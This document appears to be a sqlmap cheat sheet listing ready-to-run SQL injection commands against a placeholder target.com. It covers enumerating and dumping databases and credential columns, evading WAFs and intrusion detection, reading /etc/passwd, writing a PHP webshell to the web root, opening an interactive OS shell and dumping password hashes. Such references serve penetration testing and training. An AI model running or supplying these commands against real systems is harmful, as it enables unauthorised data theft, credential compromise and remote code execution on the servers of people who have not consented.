SQLMap — SQL Injection Automation

SQLMap automates detection and exploitation of SQL injection vulnerabilities across all major databases.

Apr 2026 lazyhackers
Basic Detection (6)
sqlmap -u "http://target.com/page?id=1"
Test GET parameter for SQLi
basic detection
sqlmap -u "http://target.com/page?id=1" --dbs
Enumerate databases
enum databases
sqlmap -u "http://target.com/page?id=1" -D dbname --tables
List tables in a database
enum tables
sqlmap -u "http://target.com/page?id=1" -D dbname -T users --columns
List columns in a table
enum columns
sqlmap -u "http://target.com/page?id=1" -D dbname -T users -C username,password --dump
Dump specific columns
dump credentials
sqlmap -u "http://target.com/page?id=1" --dump-all
Dump all databases
dump all
POST Requests & Forms (4)
sqlmap -u "http://target.com/login" --data="username=admin&password=pass"
Test POST parameters
post form
sqlmap -r request.txt
Test from saved Burp request file
burp request
sqlmap -u "http://target.com/login" --data="user=admin&pass=test" -p user
Test specific POST parameter
post param
sqlmap -u "http://target.com/page" --cookie="PHPSESSID=abc123" --data="id=1"
POST with authentication cookie
post auth cookie
Authentication & Session (3)
sqlmap -u "http://target.com/page?id=1" --cookie="session=TOKEN"
Inject with session cookie
auth cookie
sqlmap -u "http://target.com/page?id=1" -H "Authorization: Bearer TOKEN"
Inject with Bearer token
auth header
sqlmap -u "http://target.com/page?id=1" --auth-type=Basic --auth-cred="admin:password"
HTTP Basic authentication
auth basic
Techniques & Evasion (8)
sqlmap -u "http://target.com/page?id=1" --technique=BEUST
Select techniques by letter: Boolean, Error, Union, Stacked, Time
technique
sqlmap -u "http://target.com/page?id=1" --technique=T --time-sec=5
Time-based blind only
blind time
sqlmap -u "http://target.com/page?id=1" --tamper=space2comment
Use tamper script for WAF bypass
waf bypass tamper
sqlmap -u "http://target.com/page?id=1" --tamper=between,randomcase,space2comment
Chain multiple tamper scripts
waf bypass
sqlmap -u "http://target.com/page?id=1" --random-agent
Random User-Agent to avoid detection
evasion useragent
sqlmap -u "http://target.com/page?id=1" --delay=1 --safe-freq=3
Slow down requests (IDS evasion)
evasion slow
sqlmap -u "http://target.com/page?id=1" --proxy=http://127.0.0.1:8080
Route through Burp proxy
proxy burp
sqlmap -u "http://target.com/page?id=1" --level=5 --risk=3
Max level & risk (most aggressive)
aggressive
OS & Privilege Escalation (7)
sqlmap -u "http://target.com/page?id=1" --current-user --current-db --hostname
Get current DB user, database, hostname
info enum
sqlmap -u "http://target.com/page?id=1" --is-dba
Check if current user is DBA
priv dba
sqlmap -u "http://target.com/page?id=1" --file-read=/etc/passwd
Read local file (MySQL FILE priv)
fileread lfi
sqlmap -u "http://target.com/page?id=1" --file-write=shell.php --file-dest=/var/www/html/shell.php
Write webshell to server
rce shell upload
sqlmap -u "http://target.com/page?id=1" --os-shell
Interactive OS shell via SQLi
rce shell
sqlmap -u "http://target.com/page?id=1" --os-cmd="whoami"
Execute single OS command
rce cmd
sqlmap -u "http://target.com/page?id=1" --passwords
Dump DB user password hashes
passwords hashes